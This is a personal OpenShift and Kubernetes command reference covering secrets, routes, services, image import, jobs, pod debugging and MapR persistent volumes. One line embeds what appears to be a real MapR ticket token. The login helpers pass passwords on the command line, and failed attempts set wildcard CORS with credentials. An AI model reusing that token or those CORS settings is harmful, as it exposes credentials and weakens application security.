# create secret from file with specifying the name - CONTAINER_TICKET ( oc describe {name of secret} )
oc create secret generic {name of secret/token} --from-file=CONTAINER_TICKET=/tmp/maprticket_1000 -n {project name}

read secret get secret value

oc get secret $TICKET_NAME -o yaml | yq .data | awk '{print $2}' | base64 --decode
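
the same value can be read without yq/awk via jsonpath (a sketch, assuming the key is CONTAINER_TICKET as created above):

oc get secret $TICKET_NAME -o jsonpath='{.data.CONTAINER_TICKET}' | base64 --decode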

automation for creating tickets in diff namespaces

function openshift-replace-maprticket(){
    MAPR_TICKET_PATH="${1}"
    if [[ $MAPR_TICKET_PATH == "" ]]; then
        echo " first parameter should be filepath to MapR ticket PROD ! "
        return 1
    fi
    if [ ! -f $MAPR_TICKET_PATH ]; then
        echo "can't access file: ${MAPR_TICKET_PATH}"
        return 2
    fi
    oc login -u $TECH_USER -p $TECH_PASSWORD $OPEN_SHIFT_URL
    PROJECTS=("portal-pre-prod" "portal-production")
    SECRET_NAME="mapr-ticket"
    
    for OC_PROJECT in "${PROJECTS[@]}"
    do 
        echo $OC_PROJECT
        oc project $OC_PROJECT
        oc delete secret $SECRET_NAME
        oc create secret generic $SECRET_NAME --from-file=CONTAINER_TICKET=$MAPR_TICKET_PATH -n $OC_PROJECT
        oc get secret $SECRET_NAME -n $OC_PROJECT
    done
}
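
usage example for the function above (the ticket path is only an illustration):

openshift-replace-maprticket /tmp/maprticket_1000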

or from the content of the file from the previous command

oc create secret generic {name of secret/token} --from-literal=CONTAINER_TICKET='dp.prod.ubs qEnHLE7UaW81NJaDehSH4HX+m9kcSg1UC5AzLO8HJTjhfJKrQWdHd82Aj0swwb3AsxLg==' -n {project name}

create secret values

login password secret

SECRET_NAME=my-secret
KEY1=user
VALUE1=cherkavi
KEY2=password
VALUE2=my-secret-password
oc create secret generic $SECRET_NAME --from-literal=$KEY1=$VALUE1 --from-literal=$KEY2=$VALUE2

or even a mix of them

oc create secret generic $SECRET_NAME --from-file=ssh-privatekey=~/.ssh/id_rsa --from-literal=$KEY1=$VALUE1

check creation

oc get secrets
oc get secret metadata-api-token -o yaml | yq .data.METADATA_API_TOKEN | base64 --decode

secret mapping example, map secret

...
    volumeMounts:
      - name: mapr-ticket
        mountPath: "/path/inside/container"
        readOnly: true
...
  volumes:
    - name: mapr-ticket
      secret:
        secretName: my-ticket
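
as an alternative to mounting, the secret can also be exposed as environment variables of a workload (a sketch; deployment/my-app is a placeholder name):

# inject all keys of the secret as environment variables
oc set env deployment/my-app --from=secret/my-ticket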

information about cluster

kubectl cluster-info

describe information about cluster

oc describe {[object type:](https://docs.openshift.com/enterprise/3.0/cli_reference/basic_cli_operations.html#object-types)}
  • buildconfigs
  • services
  • routes
  • ...
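
for example, for any of the object types above (hello-world-http is just an illustrative name):

oc describe service hello-world-http
oc describe route hello-world-http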

take a look at all events, notifications about changes, cluster messages, problem resolving

# follow events
oc get --watch events
# print events and sort them out by time
oc get events --sort-by='.lastTimestamp' | grep " Warning "
oc get pod $OCP_POD 
oc describe pod $OCP_POD
oc logs pod/$OCP_POD

show namespace, all applications, url to service, status of all services

oc status

show route to service, show url to application

oc get routes {app name / service name}
oc get route -n demo hello-world-http -o jsonpath='{.spec.host}'
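
if the route does not exist yet, it can usually be created by exposing the service (a sketch; hello-world-http is the service name used above):

# create a route (external URL) for an existing service and print its host
oc expose service hello-world-http
oc get route hello-world-http -o jsonpath='{.spec.host}'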

route migration

FILE_NAME=route-data-api-mdf4download-service.yaml
echo "vim $FILE_NAME" | clipboard
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.metadata.labels."template.openshift.io/template-instance-owner"),(.metadata.namespace="my_namespace")' $FILE_NAME 
{
  "haproxy.router.openshift.io/rate-limit-connections": "true",
  "haproxy.router.openshift.io/rate-limit-connections.concurrent-tcp": "70",
  "haproxy.router.openshift.io/rate-limit-connections.rate-http": "70",
  "haproxy.router.openshift.io/timeout": "1800s",
}
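
## apply the cleaned manifest in the target project (a sketch; "my_namespace" is a placeholder)
# yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp)' $FILE_NAME | oc apply -n my_namespace -f -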
## doesn't work - 02
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/corsHeaders='Accept, Authorization, Content-Type, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, X-Requested-With'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/corsHeaders-

## doesn't work - 03
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response-headers='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response-headers-

## doesn't work - 04
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response_headers='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/response_headers-

## doesn't work - 05
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/hsts_header='access-control-allow-credentials: true, access-control-allow-headers: X-Requested-By\, Authorization\, Content-Type, access-control-allow-methods: GET\, POST\, PUT\, DELETE, access-control-allow-origin: *'
# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/hsts_header-

## doesn't work - 06
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/enable-cors='true'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/enable-cors-

## doesn't work - 07
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-enable='true'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-credentials='true'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers='X-Requested-By, Authorization, Content-Type'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-methods='GET, POST, PUT, DELETE'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-origin='*'
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-credentials-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-methods-
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-origin-

## doesn't work 08
# haproxy.router.openshift.io/hsts_header: "cors-allow-origin='*';cors-allow-credentials='true';includeSubDomains;preload"

## doesn't work 09
# nginx.ingress.kubernetes.io/enable-cors: "true"
# nginx.ingress.kubernetes.io/cors-allow-origin: "*"

## doesn't work  - 10
# oc annotate route $ROUTE_NAME kubernetes.io/ingress.class="nginx"
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-credentials='true'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-headers='X-Requested-By, Authorization, Content-Type'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-methods='GET, POST, PUT, DELETE'
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-origin='*'
# oc annotate route $ROUTE_NAME kubernetes.io/ingress.class-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-credentials-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-headers-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-methods-
# oc annotate route $ROUTE_NAME nginx.ingress.kubernetes.io/cors-allow-origin-

## doesn't work - 11
# oc annotate route $ROUTE_NAME haproxy-ingress.github.io/cors-allow-headers='X-Requested-By; Authorization; Content-Type'
# oc annotate route $ROUTE_NAME --overwrite=true "haproxy.router.openshift.io/hsts_header"="access-control-allow-origin=*;access-control-allow-credentials=true;includeSubDomains;preload"

route sticky session

apache webserver sticky sessions

router.openshift.io/cookie_name: any-name
curl -H "Cookie: any-name=fdc001aa7c2449755d6169; path=/; HttpOnly; Secure; SameSite=None" my-ocp-route.url

or to use for direct connection to the service

haproxy.router.openshift.io/balance: source
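
the annotation can be applied to an existing route without editing the yaml (a sketch; my-route is a placeholder):

```
oc annotate route my-route haproxy.router.openshift.io/balance=source --overwrite
# verify
oc get route my-route -o jsonpath='{.metadata.annotations}'
```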

get all information about current project, show all resources

oc get all
oc get deployment,pod,service,route,dc,pvc,secret -l deployment_name=name-of-my-deployment
oc get route/name-of-route --output json

restart pod

oc rollout latest "deploy-config-example"

restart deployment config

# DC_NAME - name of the Deployment/DeploymentConfig
oc rollout status dc $DC_NAME
oc rollout history dc $DC_NAME
oc rollout latest dc/$DC_NAME

oc get deployment $DC_NAME -o yaml | grep deployment | grep revision

service

get services

oc get services

service curl inside OCP

curl http://${SERVICE_NAME}:${SERVICE_PORT}/data-api/v1/health/
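
if no pod with curl is at hand, a throw-away pod can be used for the check (a sketch; the curl image is an assumption):

```
oc run curl-test --image=curlimages/curl --rm -it --restart=Never -- \
  curl -s "http://${SERVICE_NAME}:${SERVICE_PORT}/data-api/v1/health/"
```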

service migration

FILE_NAME=service-data-portal.yaml
oc get service/my_service --output yaml > $FILE_NAME
echo "vim $FILE_NAME" | clipboard
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIPs),(.metadata.namespace="my_new_namespace")' $FILE_NAME | clipboard

print all accounts

oc get serviceaccounts

print all roles, check assigned roles, get users, list of users

oc get rolebindings

add role to current project, assign role to project, remove role from user

oc project
oc policy add-role-to-user admin cherkavi
# oc policy remove-role-from-user admin cherkavi
oc get rolebindings

create project

oc get projects
oc new-project {project name}
oc describe project {project name}

images internal registry get images

oc get images
oc get images.image.openshift.io
# don't forget: `oc get is`

image import docker import to internal registry

IMAGE_OCP=image-registry.openshift-image-registry.svc:5000/portal-test-env/openjdk-8-slim-enhanced:ver1
IMAGE_EXTERNAL=nexus-shared.com/repository/uploadimages/openjdk-8-slim-enhanced:202110
oc import-image $IMAGE_OCP --reference-policy='local' --from=$IMAGE_EXTERNAL --confirm
oc import-image approved-apache --from=bitnami/apache:2.4 --confirm
oc import-image my-python --from=my-external.com/tdonohue/python-hello-world:latest --confirm

# if you have credential restrictions
# oc create secret docker-registry my-mars-secret --docker-server=registry.marsrover.space --docker-username="[email protected]" --docker-password=thepasswordishere
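
if such a pull secret is needed, it usually also has to be linked to the service account that pulls the image (a sketch, using the secret name from the commented command above):

```
oc secrets link default my-mars-secret --for=pull
```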

!!! in case of any errors during the creation process, pay attention to the output of the pods/....-build pod

build configs for images

oc get bc
oc describe bc/user-portal-dockerbuild 

tag image stream tag image

oc tag my-external.com/tdonohue/python-hello-world:latest my-python:latest
# Tag a specific image
oc tag openshift/ruby@sha256:6b646fa6bf5e5e4c7fa41056c27910e679c03ebe7f93e361e6515a9da7e258cc yourproject/ruby:tip

# Tag an external container image
oc tag --source=docker openshift/origin-control-plane:latest yourproject/ruby:tip

# check tag
oc get is

pod image sources pod docker image sources

just an example from real cluster

             │       ┌─────────┐
 LOCAL       │       │ Nexus   │
     ┌───────┼──1────► docker  ├────┐───────┐
     │       │       │ storage │    │       │
     │       │       └─────────┘    3       4
     │       │                      │       │
┌────┴─────┐ ├──────────────────────┼───────┼─
│  docker  │ │    OpenShift         │       │
└────┬─────┘ │                  ┌───▼──┐    │
     │       │ ┌─────────┐      │Image │    │
     │       │ │OpenShift│      │Stream│    │
     └──2────┼─►registry │      └─┬────┘    │
             │ └────┬────┘        5         │
             │      │        ┌────▼─┐       │
             │      └────6───► POD  ◄───────┘
                             └──────┘
  1. docker push
  2. docker push
  3. import-image
  4. pod pulls the image directly from Nexus
  5. pod uses the Image Stream reference
  6. pod pulls the image from the OpenShift internal registry

image stream build

in case of "no log output" during the image stream creation - check that the corresponding "-build" pod is not in "terminating" state

print current project

oc project

project select, select project

oc project {project name}

create resource ( pod, job, volume ... )

oc create -f {description file}
# oc replace -f {description file}

example of route

oc create inline oc document here

cat <<EOF | oc apply -f -
apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: $ROUTE_NAME
spec:
  host: $ROUTE_NAME-stg-3.vantage.zur
  to:
    kind: Service
    name: $ROUTE_NAME
  port:
    targetPort: 9090
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge
EOF

example of job

apiVersion: batch/v1
kind: Job
metadata:
  name: scenario-description
spec:
  nodeSelector:         
    composer: "true"
  template:         
    spec:
      containers:
      - name: scenario-description
        image: cc-artifactory.myserver.net/add-docker/scenario_description:0.23.3
        command: ["python", "-c", "'import scenario_description'"]
        env:
          - name: MAPR_TICKETFILE_LOCATION
            value: "/tmp/maprticket_202208"        
          # set environment variable from metadata
          - name: PROJECT
            valueFrom:
              fieldRef:
                fieldPath: metadata.namespace            
          - name: MAPR_TZ
            valueFrom:
              configMapKeyRef:
                name: environmental-vars
                key: MAPR_TZ
          - name: POSTGRES_USER
            valueFrom:
              secretKeyRef:
                name: postgresqlservice
                key: database-user
      restartPolicy: Never
  backoffLimit: 4
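
running and inspecting the job from the example above (a sketch; the file name is a placeholder):

```
oc create -f scenario-description-job.yaml
oc get jobs
oc logs -f job/scenario-description
# clean up
# oc delete job scenario-description
```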

mapping secrets and config maps into a pod (env / file)

  1. secret to env
          env:
            - name: POSTGRESUSER
              valueFrom:
                secretKeyRef:
                  name: postgresql-service
                  key: database-user
  2. configmap to env
          env:
            - name: MAPRCLUSTER
              valueFrom:
                configMapKeyRef:
                  name: env-vars
                  key: MAPR_CLUSTER
    envFrom:
    - configMapRef:
        name: session-config-map
    - secretRef:
        name: session-secret
  3. secret to file
    spec:
      volumes:
        - name: mapr-ticket
          secret:
            secretName: mapr-ticket
            defaultMode: 420
...
          volumeMounts:
            - name: mapr-ticket
              readOnly: true
              mountPath: /users-folder/maprticket
  4. configmap to file
    spec:
      volumes:
        - name: logging-config-volume
          configMap:
            name: log4j2-config
            defaultMode: 420
...
          volumeMounts:
            - name: logging-config-volume
              mountPath: /usr/src/config

set resource limits

oc set resources dc/{app-name} --limits=cpu=400m,memory=512Mi --requests=cpu=200m,memory=256Mi
oc autoscale dc/{app-name} --min 1 --max 5 --cpu-percent=40
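
a quick check of the applied values (sketch):

```
oc describe dc/{app-name} | grep -A 4 -i limits
oc get hpa
```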

connect to existing pod in debug mode, debug pod

# check policy
# oc adm policy add-scc-to-user mapr-apps-scc system:serviceaccount:${PROJECT_NAME}:default
# oc adm policy add-role-to-user admin ${USER_NAME} -n ${PROJECT_NAME}

oc debug pods/{name of the pod}
oc debug dc/my-dc-config --as-root --namespace my-project

# start container after fail
oc rollout latest {dc name}
# stop container after fail
oc rollback latest {dc name}

connect to existing pod, execute command on remote pod, oc exec

oc get pods --field-selector=status.phase=Running
oc rsh <name of pod>
oc rsh -c <container name> pod/<pod name>

# connect to container inside the pod with multi container
POD_NAME=data-portal-67-dx
CONTAINER_NAME=data-portal-apache
oc exec -it $POD_NAME -c $CONTAINER_NAME -- /bin/bash
# older clients: oc exec -it -p $POD_NAME -c $CONTAINER_NAME /bin/bash

execute command in pod command

# example of executing a program on pod: kafka-test-app
oc exec kafka-test-app -- /usr/bin/java

get environment variables

oc set env pod/$POD_DATA_API --list
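
environment variables can be set or removed on a deployment config the same way (sketch, names are placeholders):

```
oc set env dc/my-app MY_VAR=my-value
# remove the variable again
oc set env dc/my-app MY_VAR-
```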

copy file

# copy file from pod
oc cp <pod_name>:/<path> <local_path> -c <container_name>
oc cp api-server-256-txa8n:usr/src/cert/keystore_server /my/local/path
# for OCP4 do NOT use a leading slash like /usr/src.... 

# copy files from local folder to POD
oc rsync /my/local/folder/ test01-mz2rf:/opt/app-root/src/

# copy file to pod
oc cp <local_path> <pod_name>:/<path> -c <container_name>

forward port forwarding

oc port-forward <pod-name> <ext-port>:<int-port>
function oc-port-forwarding(){
    if [[ $# != 3 ]]
    then
        echo "port forwarding for remote pods with arguments:"
        echo "1. project-name, like 'portal-stg-8' "
        echo "2. pod part of the name, like 'collector'"
        echo "3. port number like 5005"
        return 1
    fi

	oc login -u $USER_DATA_API_USER -p $USER_DATA_API_PASSWORD $OPEN_SHIFT_URL
	oc project $1
    POD_NAME=$(oc get pods | grep Running | grep $2 | awk '{print $1}')
    echo $POD_NAME
    oc port-forward $POD_NAME $3:$3
}
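
usage example (a sketch with the argument values mentioned in the help text):

```
oc-port-forwarding portal-stg-8 collector 5005
# the remote pod port 5005 is now reachable on localhost:5005
```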

new app with "default" container

oc new-app {/local/folder/to_source}

new app with "default" container from GIT

oc new-app https://github.com/openshift/ruby-ex.git

new app with "specific" (centos/ruby-22-centos7) docker container from GIT

oc new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git

new app with "specific" (centos/ruby-22-centos7) docker container from GIT with specific sub-folder and name

oc new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git --context-dir=sub-project --name myruby

openshift new application create and check

OC_APP_NAME=python-test
OC_PROJECT_NAME=my-project
OC_ROOT=app.vantage.ubs

# cleanup before creation
oc delete route $OC_APP_NAME
oc delete service $OC_APP_NAME
oc delete deployment $OC_APP_NAME
oc delete buildconfigs.build.openshift.io $OC_APP_NAME

# create new oc application from source code
oc new-app https://github.com/cherkavi/python-deployment.git#main --name=$OC_APP_NAME

# check deployment
oc get service $OC_APP_NAME -o yaml
oc get deployment $OC_APP_NAME -o yaml
oc get buildconfigs.build.openshift.io $OC_APP_NAME -o yaml

# create route
oc create route edge $OC_APP_NAME --service=$OC_APP_NAME
# check route: tls.termination: edge
oc get route $OC_APP_NAME -o yaml

curl -X GET https://${OC_APP_NAME}-${OC_PROJECT_NAME}.${OC_ROOT}/

create ocp route

oc-login devops user_cherkashyn
OC_POD_NAME=masker-service-152-lp5n2a
OC_SERVICE_NAME=masker-service-direct
OC_SERVICE_PORT=8080
OC_ROUTE_NAME=$OC_SERVICE_NAME

oc expose pod $OC_POD_NAME --name $OC_SERVICE_NAME
oc get services | grep $OC_SERVICE_NAME
## insecure options only, no TLS termination
# oc expose service $OC_SERVICE_NAME --name=$OC_ROUTE_NAME
## spec.tls.insecureEdgeTerminationPolicy: Redirect
oc create route edge $OC_ROUTE_NAME --service=$OC_SERVICE_NAME --port=$OC_SERVICE_PORT  --insecure-policy Redirect
ROUTE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

# oc create inline  oc document here
cat <<EOF | oc apply -f -
apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: $ROUTE_NAME
spec:
  host: $ROUTE_NAME-stg-3.vantage.zu
  to:
    kind: Service
    name: $ROUTE_NAME
  port:
    targetPort: 9090
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge
EOF

# oc annotate route $ROUTE_NAME haproxy.router.openshift.io/balance='source'
oc annotate --overwrite route $ROUTE_NAME haproxy.router.openshift.io/ip_header='X-Real-IP'
# oc annotate --overwrite route $ROUTE_NAME haproxy.router.openshift.io/balance='leastconn'
# # roundrobin
# 
oc get route $ROUTE_NAME -o yaml
# oc delete route $ROUTE_NAME
# 
#         +---------+
#         | route  |-+
#  +------+        |-+
# host    +----+----+   +-----------+
#              |        | service   |
#              +---------> / host   |
#                       |           |
#                       +-----------+
#                   targetPort


apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: parking-page
spec:
  host: application.vantage.zur
  to:
    kind: Service
    name: parking-page 
  port:
    targetPort: 9191
  tls:
    insecureEdgeTerminationPolicy: None
    termination: edge

service example

# get <labels> for pointing out to pod(s)
oc get pods <unique pod name> -o json | jq -r .metadata.labels
SERVICE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

cat <<EOF | oc apply -f -
apiVersion: v1
kind: Service
metadata:
  name: $SERVICE_NAME
  namespace: $OCP_PROJECT
spec:
  ports:
  - name: 9090-tcp
    port: 9090
    protocol: TCP
    targetPort: 9090
  selector:
    app: $SERVICE_NAME
  sessionAffinity: None  
  type: ClusterIP
EOF
#        +----------+
#        | service  |-+
#  +-----+          |-+
# port   +-----+----+   +---------------+
#              |        | * deployment  |
#              +--------> * depl.config |
#                       | * <labels>    |
#                       +---------------+
#                   targetPort
# 

apiVersion: v1
kind: Service
metadata:
  name: parking-page
  namespace: project-portal
spec:
  ports:
  - name: 9191-tcp
    port: 9191
    protocol: TCP
    targetPort: 9191
  selector:
    deploymentconfig: parking-service
  sessionAffinity: None
  type: ClusterIP

possible solution for providing external ip address of the client ( remote_addr )

  ## ----------
  type: ClusterIP

  ## ----------
  # externalTrafficPolicy: Local
  # type: LoadBalancer

start pod, pod example

DEPLOYMENT_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03
CONTAINER_URI=default-route-openshift-image-registry.vantage.zu/simple-application-staging-03/maprtech_pacc_python3:20230829

cat <<EOF | oc apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
    name: $DEPLOYMENT_NAME
spec:
    # replicas: 3
    selector:
        matchLabels:
            app: $DEPLOYMENT_NAME
    template:
        metadata:
            labels:
                app: $DEPLOYMENT_NAME
        spec:
            containers:
            - name: html-container
              image: $CONTAINER_URI
              command: ["sleep", "3600"]
              ports:
                - containerPort: 9090
EOF

oc get deployment $DEPLOYMENT_NAME -o yaml
# oc delete deployment $DEPLOYMENT_NAME

import specific image

oc import-image jenkins:v3.7 --from='registry.access.redhat.com/openshift3/jenkins-2-rhel7:v3.7' --confirm -n openshift

inside pod start python application on specific port

  1. create python application
cat <<'EOF' > app.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class CustomRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html"); self.end_headers() # curl: (1) Received HTTP/0.9 when not allowed
        
        self.wfile.write(f"remote_addr:{self.client_address[0]} <br />\n".encode("utf-8"))
        self.wfile.write(f"HTTP_X_CLIENT_IP   {self.headers['HTTP_X_CLIENT_IP']} <br />\n".encode("utf-8"))
        self.wfile.write(f"HTTP_X_FORWARDED_FOR   {self.headers['HTTP_X_FORWARDED_FOR']} <br />\n".encode("utf-8"))
        for each_header in self.headers:
            self.wfile.write(f"{each_header}   {self.headers[each_header]} <br />\n".encode("utf-8"))

if __name__ == '__main__':
    server_address = ('', 9090)
    httpd = HTTPServer(server_address, CustomRequestHandler)
    print('Server is running on http://localhost:9090')
    httpd.serve_forever()
EOF
  2. copy source code to the container
DEPLOYMENT_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

pod_name=`oc get pods | grep Running | grep $DEPLOYMENT_NAME | awk '{print $1}'`
oc cp app.py $pod_name:/app.py
oc rsh $pod_name
bash
cat app.py
python3 app.py
  3. execute curl request to route
curl https://sticky-sessions-stg-3.vantage.zu

log from

oc logs pod/{name of pod}
oc logs -c <container> pods/<pod-name>
oc logs --follow bc/{name of app}

describe resource, information about resource

oc describe job {job name}
oc describe pod {pod name}

edit resource

export EDITOR=vim
oc edit pv pv-my-own-volume-1

or

oc patch pv/pv-my-own-volume-1 --type json -p '[{ "op": "remove", "path": "/spec/claimRef" }]'

debug pod

oc debug deploymentconfig/$OC_DEPL_CONFIG -c $OC_CONTAINER_NAME --namespace $OC_NAMESPACE

container error pod error

config map

# list of config maps
oc get configmap

# describe one of the config map 
oc get configmaps "httpd-config" -o yaml
oc describe configmap data-api-config
oc describe configmap gatekeeper-config

oc create configmap httpd-config-2 --from-file=httpd.conf=my-file-in-current-folder.txt
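
a config map can also be created from literals and then referenced via configMapKeyRef / envFrom as shown in the examples above (sketch, names and values are placeholders):

```
oc create configmap env-vars --from-literal=MAPR_TZ=Europe/Zurich --from-literal=MAPR_CLUSTER=dp.prod
oc get configmap env-vars -o yaml
```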

Grant permission to be able to access OpenShift REST API and discover services.

oc policy add-role-to-user view -n {name of application/namespace} -z default
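
a sketch of calling the REST API with the default service-account token afterwards (oc create token needs OCP 4.11+ / a newer oc client; older clusters use oc sa get-token):

```
SA_TOKEN=$(oc create token default)      # OCP 4.11+; older: oc sa get-token default
API_SERVER=$(oc whoami --show-server)
curl -sk -H "Authorization: Bearer ${SA_TOKEN}" \
  "${API_SERVER}/api/v1/namespaces/$(oc project -q)/services"
```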

information about current configuration

oc config view

the same as

cat ~/.kube/config

check accessible applications, ulr to application, application path

oc describe routes

look for the "Requested Host:" field in the output

delete/remove information about some entities into project

oc delete {type} {type name}
  • buildconfigs
  • services
  • routes
  • ...

Istio external service exposing

oc get svc istio-ingressgateway -n istio-system

expose services

if your service is listed only with an internal address like svc/web - 172.30.20.243:8080 instead of an external link like http://gateway-myproject.192.168.42.43.nip.io to pod port 8080 (svc/gateway), then you can "expose" it to the external world:

  • oc expose services/{app name}
  • oc expose service/{app name}
  • oc expose svc/{app name}

Liveness and readiness probes

# set readiness/liveness
oc set probe dc/{app-name} --liveness --readiness --get-url=http://:8080/health
# remove readiness/liveness
oc set probe dc/{app-name} --remove --liveness --readiness --get-url=http://:8080/health
# oc set probe dc/{app-name} --remove --liveness --readiness --get-url=http://:8080/health --initial-delay-seconds=30
 
# Set a readiness probe to try to open a TCP socket on 3306
oc set probe rc/mysql --readiness --open-tcp=3306

Readiness probe will stop after first positive check
Liveness probe will be executed again and again (period) during container lifetime
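
to inspect which probes are currently configured on a deployment config (a sketch; the dc name is a placeholder):

```
DC_NAME=my-app   # placeholder
oc get dc/$DC_NAME -o jsonpath='{.spec.template.spec.containers[0].readinessProbe}'; echo
oc get dc/$DC_NAME -o jsonpath='{.spec.template.spec.containers[0].livenessProbe}'; echo
```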

current ip address

minishift ip

open web console

minishift console

Kubernetes

print all context

kubectl config get-contexts

print current context

kubectl config current-context

api version

kubectl api-versions

example output of 'oc new-app':

--> Success Build scheduled, use 'oc logs -f bc/web' to track its progress. Application is not exposed. You can expose services to the outside world by executing one or more of the commands below: 'oc expose svc/web' Run 'oc status' to view your app.

job example

!!! an OpenShift/Kubernetes Job runs only the specified command - the image ENTRYPOINT is skipped (use args instead of command to keep the ENTRYPOINT)

apiVersion: batch/v1
kind: Job
metadata:
  name: test-job-traceroute
spec:
  nodeSelector:         
    composer: "true"
  template:         
    spec:
      containers:
      - name: busybox
        image: busybox
        command: ["traceroute", "cc-art.group.net"]
          
      restartPolicy: Never
  backoffLimit: 4
---
apiVersion: batch/v1
kind: Job
metadata:
  name: scenario-description
spec:
  template:         
    spec:
      containers:
      - name: scenario-description
        image: scenario_description:0.2.3
        command: ["python", "-c", "'import scenario_description'"]
      restartPolicy: Never

pod example simple pod minimal pod infinite pod running

apiVersion: v1
kind: Pod
metadata:
  name: test01
spec:
  containers:
  - name: test01
    image: busybox
    command: ["sleep", "36000"]
  restartPolicy: Never

pod sidecar

apiVersion: v1
kind: Pod
metadata:
  name: test01
spec:
  containers:
  - name: test01
    image: busybox
    command: ["sleep", "36000"]
  - name: test02
    image: busybox
    command: ["sleep", "36000"]
  restartPolicy: Never

pod with mapping

apiVersion: v1
kind: Pod
metadata:
  name: connect-to-me
spec:
  containers:
  - name: just-a-example
    image: busybox
    command: ["sleep", "36000"]
    volumeMounts:
    - mountPath: /source
      name: maprvolume-source
    - mountPath: /destination
      name: maprvolume-destination
    - name: httpd-config-volume
      mountPath: /usr/local/apache2/conf/httpd.conf      
    - name: kube-api-access-q55
      readOnly: true
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount  
  volumes:
  - name: maprvolume-source
    persistentVolumeClaim:
      claimName: pvc-scenario-input-prod
  - name: maprvolume-destination
    persistentVolumeClaim:
      claimName: pvc-scenario-output-prod
  - name: httpd-config-volume
    configMap:
      name: httpd-config
      defaultMode: 420      
  - name: kube-api-access-q55
    projected:
      sources:
        - serviceAccountToken:
            expirationSeconds: 3607
            path: token
        - configMap:
            name: kube-root-ca.crt
            items:
              - key: ca.crt
                path: ca.crt
        - downwardAPI:
            items:
              - path: namespace
                fieldRef:
                  apiVersion: v1
                  fieldPath: metadata.namespace
        - configMap:
            name: openshift-service-ca.crt
            items:
              - key: service-ca.crt
                path: service-ca.crt
        defaultMode: 420
  restartPolicy: Never

Persistent Volume with Persistent Volume Claim example

For a MapR cluster, be aware of the dependency chain: MapR ticket-file ----<> Secret ----<> PV ----<> PVC

pv mapr

kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-workloads-staging-01
spec:
  capacity:
    storage: 50Gi
  csi:
    driver: com.mapr.csi-kdf
    volumeHandle: pv-workloads-staging-01
    volumeAttributes:
      cldbHosts: >-
        dpmtjp0001.swiss.com dpmtjp0002.swiss.com
        dpmtjp0003.swiss.com dpmtjp0004.swiss.com
      cluster: dp.stg.swiss
      platinum: 'false'
      securityType: secure
      volumePath: /data/reprocessed/sensor
    nodePublishSecretRef:
      name: hil-supplier-01
      namespace: workloads-staging
  accessModes:
    - ReadWriteMany
  claimRef:
    kind: PersistentVolumeClaim
    namespace: workloads-staging
    name: pvc-supplier-01
  persistentVolumeReclaimPolicy: Retain
  volumeMode: Filesystem
status:
  phase: Bound
---
kind: PersistentVolume
apiVersion: v1
metadata:
  name: pv-mapr-tmp
spec:
  capacity:
    storage: 10Gi
  csi:
    driver: com.mapr.csi-kdf
    volumeHandle: pv-mapr-tmp
    volumeAttributes:
      cldbHosts: >-
        esp000004.swiss.org esp000007.swiss.org
        esp000009.swiss.org esp000010.swiss.org
      cluster: prod.zurich
      securityType: secure
      volumePath: /tmp/
    nodePublishSecretRef:
      name: mapr-secret
      namespace: pre-prod
  accessModes:
    - ReadWriteMany
  claimRef:
    kind: PersistentVolumeClaim
    namespace: pre-prod
    name: pvc-mapr-tmp
    apiVersion: v1
  persistentVolumeReclaimPolicy: Delete
  volumeMode: Filesystem
status:
  phase: Bound

if you are going to edit/change a PV you should:

  1. remove the PV
  2. remove the PVC
